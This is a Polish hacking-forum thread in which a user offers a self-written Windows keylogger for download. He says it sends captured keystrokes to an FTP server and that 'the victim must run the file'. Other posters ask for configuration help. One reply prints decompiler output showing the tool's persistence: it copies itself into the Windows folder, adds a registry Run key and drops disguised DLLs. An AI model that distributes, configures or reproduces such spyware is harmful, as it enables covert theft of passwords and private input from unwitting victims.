[download] keylogger

[widmo17]

Dzisiaj szperając po dysku znalazłem mojego keyloggera... pisanego z sześć miesięcy temu na zlecenie, ale zleceniodawca zrezygnował, a key pozostał ; x. Jak komuś się nudzi, czy coś, może sobie zobaczyć. Jest napisany w formie konfiguratora, zresztą wszystko pisze w `read_me.txt`. Logi są wysyłane na podany ftp.

http://www.widmo.us/dodatki/winlog.rar

Nie spodziewajcie się nie wiadomo jakiego przeboju ani niesamowitej niewykrywalności, nie skanowałem go, bo mi się nie chciało xP

//F.A.Q.:
1. Blokuje firewall
2. Jest włączony antywirus
3. Zła konfiguracja
4. Ofiara musi uruchomić plik
5. Nie, nie pomogę Ci w konfiguracji

 

[Gondoller]

haha ^^
dobre. mozna sie pobawic.. jakas wersja w czystym kodzie? ^^

 

[widmo17]

jakas wersja w czystym kodzie?[/b]

brak, straciłem źródła ;x została sama aplikacja w paczce rar xP

 

[Gondoller]

Hmm... moze przeszlaby jakowas dekompilacja? ^^ W kazdym razie ogarnie sie ogolnie wyglad i funkcjonalnosc

 

[Samus3k]

Co mam wpisac w punkcie host ftp, login ftp, hasło ftp?

 

[djmentos]

Książka od inormatyki, strona 5, rozdział 2. ;]
albo
//nieaktywny link

 

[0wn3r]

Nie mogłem sie powstrzymać, by nie zajrzeć do źródła.. Może to napisałeś już w pierwszym poście, ale ja też napisze.

Ledwo otworzyłem plik serwer.exe programem DeDe, patrze na procedure FormCreate, a tu jak byk:

* Possible String Reference to: 'C:\WINDOWS\windll32lib.exe'
* Reference to: kernel32.CopyFileA()
* Reference to: Registry.TRegistry.Create(TRegistry;boolean);overload;
* Reference to: Registry.TRegistry.SetRootKey(TRegistry;HKEY);
* Possible String Reference to: 'Software\Microsoft\Windows\CurrentVersionRun'
* Possible String Reference to: 'C:/plik.exe'
* Possible String Reference to: 'wind32dll'
* Possible String Reference to: '‹ĺ]ĂC:\WINDOWS\windll32lib.exe'

To samo mówi za siebie. Tzn keylogger zapisuje sie do:

C:\WINDOWS\windll32lib.exe

A o tym mówi ta linijka:

* Reference to: kernel32.CopyFileA()

A oprócz tego jest niewiadoma:

* Possible String Reference to: 'wind32dll'

Oraz linijka gdzie się keylogger do rejestru dodaje:

* Possible String Reference to: 'Software\Microsoft\Windows\CurrentVersionRun'

Teraz patrze do OnDestroy:

* Possible String Reference to: 'log-key.dll'
* Possible String Reference to: 'C:\win32library.dll'
* Possible String Reference to: 'schowek.dll'
* Possible String Reference to: 'C:\winclip32.dll'
* Possible String Reference to: 'C:\win32library.dll'
* Possible String Reference to: 'C:\winclip32.dll'

Heh.

Oprócz tego wrzuciłeś timer'a na formę, ale bardziej mnie martwi komponent KeySpy. Mogłeś oprzeć keylogger'a na globalnym hook'u ale to już twój wybór

PS. Nie wiedziałem że tak dużo syfu zostawiają komponenty INDY wciśnięte w program..

 

[widmo17]

536**** 20:46:25
pobrałem winlogger i kiedy go otwieram to mam podać host login i hasło ftp to co ja mam tam podac?[/b]

Hmm... chyba piszę nie wyraźnie czy coś
NIE POMAGAM PRZY KONGFIGURACJI!! MASZ GOOGLE TO ICH UŻYWAJ!!

@up: program pisany `dawno temu w trawie`, więc się nie starałem zbytnio, poza tym wiedza nie ta

//aha, jeszcze coś. Own3r, nie dziw się, u mnie w app w delphi kiedyś był taki burdel na trzech kółkach, że jak czytam stare źródła to aż się za głowę łapię ; x

 

[KoshiMazaki]

Hej widmo12 mam problemik jak konfiguruje winloggera i naciskam "utwórz serwer" to nic się nie dzieje wszystko wpisałem właściwie. ;/